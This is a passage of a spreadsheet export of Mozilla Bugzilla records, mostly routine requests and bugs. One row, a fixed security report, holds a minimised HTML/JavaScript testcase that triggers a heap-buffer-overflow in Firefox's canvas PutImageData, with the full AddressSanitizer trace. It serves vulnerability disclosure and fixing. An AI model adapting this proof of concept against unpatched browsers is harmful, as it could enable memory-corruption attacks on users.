          <t>normal</t>
        </is>
      </c>
      <c r="S290" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T290" t="n">
        <v>1</v>
      </c>
      <c r="U290" t="n">
        <v>0</v>
      </c>
      <c r="V290" t="n">
        <v>5</v>
      </c>
      <c r="W290" t="inlineStr">
        <is>
          <t>Student Ambassadors form needs styles:
https://www-dev.allizom.org/b/en-US/contribute/universityambassadors/
Targeting to go live this week hence P1 status.</t>
        </is>
      </c>
      <c r="X290" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="291">
      <c r="A291" t="n">
        <v>1347785</v>
      </c>
      <c r="B291" t="inlineStr">
        <is>
          <t>2017-03-15 20:13:02 -0700</t>
        </is>
      </c>
      <c r="C291" t="inlineStr">
        <is>
          <t>Add churn_dev to hive metastore</t>
        </is>
      </c>
      <c r="D291" t="inlineStr">
        <is>
          <t>2022-07-26 12:18:12 -0700</t>
        </is>
      </c>
      <c r="E291" t="n">
        <v>1</v>
      </c>
      <c r="F291" t="n">
        <v>1</v>
      </c>
      <c r="G291" t="n">
        <v>2</v>
      </c>
      <c r="H291" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I291" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J291" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K291" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L291" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M291" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N291" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O291" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P291" t="inlineStr">
        <is>
          <t>[SvcOps]</t>
        </is>
      </c>
      <c r="Q291" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R291" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S291" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T291" t="n">
        <v>1</v>
      </c>
      <c r="U291" t="n">
        <v>0</v>
      </c>
      <c r="V291" t="n">
        <v>2</v>
      </c>
      <c r="W291" t="inlineStr">
        <is>
          <t>The churn_dev dataset is a temporary table containing the churn dataset with two additional columns that represent URI counts.
The dataset lives in s3 at [1]. It should be named `churn_dev`.
[1] s3://net-mozaws-prod-us-west-2-pipeline-analysis/amiyaguchi/churn_dev/v2</t>
        </is>
      </c>
      <c r="X291" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="292">
      <c r="A292" t="n">
        <v>1459162</v>
      </c>
      <c r="B292" t="inlineStr">
        <is>
          <t>2018-05-04 04:22:30 -0700</t>
        </is>
      </c>
      <c r="C292" t="inlineStr">
        <is>
          <t>heap-buffer-overflow in mozilla::dom::CanvasRenderingContext2D::PutImageData</t>
        </is>
      </c>
      <c r="D292" t="inlineStr">
        <is>
          <t>2024-05-30 09:45:52 -0700</t>
        </is>
      </c>
      <c r="E292" t="n">
        <v>1</v>
      </c>
      <c r="F292" t="n">
        <v>1</v>
      </c>
      <c r="G292" t="n">
        <v>3</v>
      </c>
      <c r="H292" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I292" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J292" t="inlineStr">
        <is>
          <t>Graphics: Canvas2D</t>
        </is>
      </c>
      <c r="K292" t="inlineStr">
        <is>
          <t>61 Branch</t>
        </is>
      </c>
      <c r="L292" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M292" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N292" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O292" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P292" t="inlineStr">
        <is>
          <t>[adv-main61+][adv-esr52.9+][adv-esr60.1+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q292" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R292" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S292" t="inlineStr">
        <is>
          <t>mozilla62</t>
        </is>
      </c>
      <c r="T292" t="n">
        <v>1</v>
      </c>
      <c r="U292" t="n">
        <v>0</v>
      </c>
      <c r="V292" t="n">
        <v>18</v>
      </c>
      <c r="W292" t="inlineStr">
        <is>
          <t>Created attachment 8973156
crash.html (minimised testcase)
The following testcase crashes the latest ASAN build of Firefox 61.0a1 (SourceStamp=8994f35fe5fc89f4e8f4e09579a6962f8a4a3e65).
crash.html:
&lt;script&gt;
function start() {
	o24=document.createElement('marquee');
	document.documentElement.addEventListener('DOMAttrModified',fun0);
	o44=document.createElement('canvas');
	document.documentElement.appendChild(o44);
	document.documentElement.appendChild(o24);
	o169=o44.getContext('2d');
	o210.putImageData(o243,32,29,33,256,16,-40960);
}
function fun0() {
	o210=o44.getContext('2d');
	o243=o210.createImageData(128,-786428);
	o44.setAttribute('height','48');
	o210.resetTransform();
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==4657==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x63000007e604 at pc 0x7f744181a584 bp 0x7ffe9a7306a0 sp 0x7ffe9a730698
WRITE of size 16 at 0x63000007e604 thread T0 (file:// Content)
    #0 0x7f744181a583 in void mozilla::gfx::Premultiply_SSE2&lt;true, false&gt;(unsigned char const*, int, unsigned char*, int, mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt;) /builds/worker/workspace/build/src/gfx/2d/SwizzleSSE2.cpp:110:7
    #1 0x7f744195eb0a in mozilla::gfx::PremultiplyData(unsigned char const*, int, mozilla::gfx::SurfaceFormat, unsigned char*, int, mozilla::gfx::SurfaceFormat, mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /builds/worker/workspace/build/src/gfx/2d/Swizzle.cpp
    #2 0x7f7444eef273 in mozilla::dom::CanvasRenderingContext2D::PutImageData_explicit(int, int, unsigned int, unsigned int, mozilla::dom::TypedArray&lt;unsigned char, &amp;js::UnwrapUint8ClampedArray, &amp;(JS_GetUint8ClampedArrayData(JSObject*, bool*, JS::AutoRequireNoGC const&amp;)), &amp;js::GetUint8ClampedArrayLengthAndData, &amp;(JS_NewUint8ClampedArray(JSContext*, unsigned int))&gt;*, bool, int, int, int, int) /builds/worker/workspace/build/src/dom/canvas/CanvasRenderingContext2D.cpp:5796:3
    #3 0x7f7444eeff18 in mozilla::dom::CanvasRenderingContext2D::PutImageData(mozilla::dom::ImageData&amp;, double, double, double, double, double, double, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/canvas/CanvasRenderingContext2D.cpp:5672:12
    #4 0x7f7443c0956a in mozilla::dom::CanvasRenderingContext2DBinding::putImageData(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::CanvasRenderingContext2D*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CanvasRenderingContext2DBinding.cpp:4124:13
    #5 0x7f7444dc8ab1 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3260:13
    #6 0x7f744b688d67 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:280:15
    #7 0x7f744b688d67 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:467
    #8 0x7f744b67342f in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:12
    #9 0x7f744b67342f in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3086
    #10 0x7f744b659ad3 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:417:12
    #11 0x7f744b688ae5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:489:15
    #12 0x7f744b689d62 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:535:10
    #13 0x7f744c1b995a in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2989:12
    #14 0x7f744454f3ae in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:264:37
    #15 0x7f744553383a in Call&lt;nsISupports *&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #16 0x7f744553383a in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
    #17 0x7f74454fa59d in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1121:52
    #18 0x7f74454fbcab in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1288:20
    #19 0x7f74454e6307 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:528:16
    #20 0x7f74454ea133 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:934:9
    #21 0x7f74477d3b38 in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1066:7
    #22 0x7f744a92cbc2 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7236:21
    #23 0x7f744a928fe9 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7029:7
    #24 0x7f744a9307ef in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #25 0x7f74415a0857 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1315:3
    #26 0x7f744159f8da in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:858:14
    #27 0x7f744159c4b5 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:747:9
    #28 0x7f744159e47c in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:632:5
    #29 0x7f744159f49c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp
    #30 0x7f743f90ee0a in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:629:28
    #31 0x7f744298163a in DoUnblockOnload /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:8422:18
    #32 0x7f744298163a in nsDocument::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:8344
    #33 0x7f7442962384 in nsIDocument::DispatchContentLoadedEvents() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:5328:3
    #34 0x7f7442a748d4 in applyImpl&lt;nsIDocument, void (nsIDocument::*)()&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1165:12
    #35 0x7f7442a748d4 in apply&lt;nsIDocument, void (nsIDocument::*)()&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1171
    #36 0x7f7442a748d4 in mozilla::detail::RunnableMethodImpl&lt;nsIDocument*, void (nsIDocument::*)(), true, (mozilla::RunnableKind)0&gt;::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1216
    #37 0x7f743f707161 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:337:32
    #38 0x7f743f725f59 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1090:14
    #39 0x7f743f741990 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:519:10
    #40 0x7f74406208ba in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #41 0x7f74405743b9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #42 0x7f74405743b9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #43 0x7f74405743b9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #44 0x7f744712c8ca in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:157:27
    #45 0x7f744b39fd0b in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:893:22
    #46 0x7f74405743b9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #47 0x7f74405743b9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #48 0x7f74405743b9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #49 0x7f744b39f6d0 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:719:34
    #50 0x4f50dc in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:50:30
    #51 0x4f50dc in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #52 0x7f745f37482f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #53 0x42476c in _start (/fuzzer3/firefox/firefox+0x42476c)
0x63000007e604 is located 260 bytes to the right of 57600-byte region [0x630000070400,0x63000007e500)
allocated by thread T0 (file:// Content) here:
    #0 0x4c569a in calloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:97:3
    #1 0x7f744a1d837a in sk_calloc_canfail /builds/worker/workspace/build/src/gfx/skia/skia/include/private/SkMalloc.h:74:12
    #2 0x7f744a1d837a in MakeUsing /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkMallocPixelRef.cpp:76
    #3 0x7f744a1d837a in SkMallocPixelRef::MakeZeroed(SkImageInfo const&amp;, unsigned long) /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkMallocPixelRef.cpp:91
    #4 0x7f7449db4262 in SkSurface::MakeRaster(SkImageInfo const&amp;, unsigned long, SkSurfaceProps const*) /builds/worker/workspace/build/src/gfx/skia/skia/src/image/SkSurface_Raster.cpp:216:28
    #5 0x7f74417a9b4f in mozilla::gfx::DrawTargetSkia::Init(mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::SurfaceFormat) /builds/worker/workspace/build/src/gfx/2d/DrawTargetSkia.cpp:1918:14
    #6 0x7f74417b6ceb in mozilla::gfx::Factory::CreateDrawTarget(mozilla::gfx::BackendType, mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::SurfaceFormat) /builds/worker/workspace/build/src/gfx/2d/Factory.cpp:403:22
    #7 0x7f7441b3fa7c in mozilla::layers::PersistentBufferProviderBasic::Create(mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt;, mozilla::gfx::SurfaceFormat, mozilla::gfx::BackendType) /builds/worker/workspace/build/src/gfx/layers/PersistentBufferProvider.cpp:83:55
    #8 0x7f7441bc76d3 in mozilla::layers::LayerManager::CreatePersistentBufferProvider(mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::SurfaceFormat) /builds/worker/workspace/build/src/gfx/layers/Layers.cpp:146:5
    #9 0x7f7444eb952d in mozilla::dom::CanvasRenderingContext2D::TrySharedTarget(RefPtr&lt;mozilla::gfx::DrawTarget&gt;&amp;, RefPtr&lt;mozilla::layers::PersistentBufferProvider&gt;&amp;) /builds/worker/workspace/build/src/dom/canvas/CanvasRenderingContext2D.cpp:1877:32
    #10 0x7f7444eb5748 in mozilla::dom::CanvasRenderingContext2D::EnsureTarget(mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const*, mozilla::dom::CanvasRenderingContext2D::RenderingMode) /builds/worker/workspace/build/src/dom/canvas/CanvasRenderingContext2D.cpp:1686:8
    #11 0x7f7444ebf3a1 in TransformWillUpdate /builds/worker/workspace/build/src/dom/canvas/CanvasRenderingContext2D.cpp:3660:3
    #12 0x7f7444ebf3a1 in SetTransform /builds/worker/workspace/build/src/dom/canvas/CanvasRenderingContext2D.cpp:2254
    #13 0x7f7444ebf3a1 in mozilla::dom::CanvasRenderingContext2D::ResetTransform(mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/canvas/CanvasRenderingContext2D.cpp:2285
    #14 0x7f7443c20818 in mozilla::dom::CanvasRenderingContext2DBinding::resetTransform(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::CanvasRenderingContext2D*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CanvasRenderingContext2DBinding.cpp:6438:9
    #15 0x7f7444dc8ab1 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3260:13
    #16 0x7f744b688d67 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:280:15
    #17 0x7f744b688d67 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:467
    #18 0x7f744b67342f in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:12
    #19 0x7f744b67342f in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3086
    #20 0x7f744b659ad3 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:417:12
    #21 0x7f744b688ae5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:489:15
    #22 0x7f744b689d62 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:535:10
    #23 0x7f744c1b995a in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2989:12
    #24 0x7f74445545f5 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:51:8
    #25 0x7f74454fa54e in HandleEvent&lt;mozilla::dom::EventTarget *&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:66:12
    #26 0x7f74454fa54e in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1118
    #27 0x7f74454fbcab in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1288:20
    #28 0x7f74454e6607 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:560:14
    #29 0x7f74454ea133 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:934:9
    #30 0x7f74454ec38b in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsPresContext*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp
    #31 0x7f7442a2f4f8 in nsINode::DispatchEvent(mozilla::dom::Event&amp;, mozilla::dom::CallerType, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/nsINode.cpp:1079:5
    #32 0x7f744550a6f3 in mozilla::dom::EventTarget::DispatchEvent(mozilla::dom::Event&amp;) /builds/worker/workspace/build/src/dom/events/EventTarget.cpp:204:13
    #33 0x7f7445480b3c in mozilla::AsyncEventDispatcher::Run() /builds/worker/workspace/build/src/dom/events/AsyncEventDispatcher.cpp:68:12
    #34 0x7f7442580d5f in nsContentUtils::RemoveScriptBlocker() /builds/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5635:15
    #35 0x7f744295e987 in nsDocument::EndUpdate(unsigned int) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:5103:3
    #36 0x7f74458dfc2c in nsHTMLDocument::EndUpdate(unsigned int) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2120:15
SUMMARY: AddressSanitizer: heap-buffer-overflow /builds/worker/workspace/build/src/gfx/2d/SwizzleSSE2.cpp:110:7 in void mozilla::gfx::Premultiply_SSE2&lt;true, false&gt;(unsigned char const*, int, unsigned char*, int, mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt;)
Shadow bytes around the buggy address:
  0x0c6080007c70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c6080007c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c6080007c90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c6080007ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c6080007cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c6080007cc0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c6080007cd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c6080007ce0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c6080007cf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c6080007d00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c6080007d1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4657==ABORTING</t>
        </is>
      </c>
      <c r="X292" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="293">
      <c r="A293" t="n">
        <v>32407</v>
      </c>
      <c r="B293" t="inlineStr">
        <is>
          <t>2000-03-18 17:07:20 -0800</t>
        </is>
      </c>
      <c r="C293" t="inlineStr">
        <is>
          <t>large files corrupted on download</t>
        </is>
      </c>
      <c r="D293" t="inlineStr">
        <is>
          <t>2016-07-15 12:13:22 -0700</t>
        </is>
      </c>
      <c r="E293" t="n">
        <v>1</v>
      </c>
      <c r="F293" t="n">
        <v>1</v>
      </c>
      <c r="G293" t="n">
        <v>6</v>
      </c>
      <c r="H293" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I293" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J293" t="inlineStr">
        <is>
          <t>Tracking</t>
        </is>
      </c>
      <c r="K293" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L293" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M293" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N293" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O293" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P293" t="inlineStr">
        <is>
          <t>[PDT+] fix in hand</t>
        </is>
      </c>
      <c r="Q293" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R293" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S293" t="inlineStr">
        <is>
          <t>M15</t>
        </is>
      </c>
      <c r="T293" t="n">
        <v>1</v>
      </c>
      <c r="U293" t="n">
        <v>0</v>
      </c>
      <c r="V293" t="n">
        <v>30</v>
      </c>
      <c r="W293" t="inlineStr">
        <is>
          <t>Any ZIP file saved w. Mozilla reports a bad CRC when tested with Winzip. Tried 2
skinz at Chromezone and a few other zip d/l's-- files were ok with Nav 4.7 and
IE, corrupt with Moz.</t>
        </is>
      </c>
      <c r="X293" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="294">
      <c r="A294" t="n">
        <v>1536665</v>
      </c>
      <c r="B294" t="inlineStr">
        <is>
          <t>2019-03-19 16:12:47 -0700</t>
        </is>
      </c>
      <c r="C294" t="inlineStr">
        <is>
          <t>Set up whatsnewpage on the beta channel to be shown after each major version update</t>
        </is>
      </c>
      <c r="D294" t="inlineStr">
        <is>
          <t>2019-04-18 14:55:28 -0700</t>
        </is>
      </c>
      <c r="E294" t="n">
        <v>1</v>
      </c>
      <c r="F294" t="n">
        <v>1</v>
      </c>
      <c r="G294" t="n">
        <v>5</v>
      </c>
      <c r="H294" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I294" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J294" t="inlineStr">
        <is>
          <t>Release Requests</t>
        </is>
      </c>
      <c r="K294" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L294" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M294" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N294" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O294" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P294" t="inlineStr">
        <is>
          <t>[releng:q2:2019]</t>
        </is>
      </c>
      <c r="Q294" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R294" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S294" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T294" t="n">
        <v>1</v>
      </c>
      <c r="U294" t="n">
        <v>0</v>
      </c>
      <c r="V294" t="n">
        <v>19</v>
      </c>
      <c r="W294" t="inlineStr">
        <is>
          <t>The request is to show a/the whatsnew page to beta users coming from the most recent version to the next dot release
The Websites team will re-purpose the content, verbatim, from https://www.mozilla.org/en-US/firefox/66.0/whatsnew/
It looks like 67.0b15 (I'm not sure if the version is correct as the previous is .0b4) is the next one, targeted for April 29th as in this doc - 
https://docs.google.com/document/d/1feDkXleRXMJJS9lxP_vbyBApIDoEr44KchAZoYHkS54/edit
29 Apr
67.0b15 gtb  
(Desktop &amp; Fennec)</t>
        </is>
      </c>
      <c r="X294" t="n">
        <v>0</v>
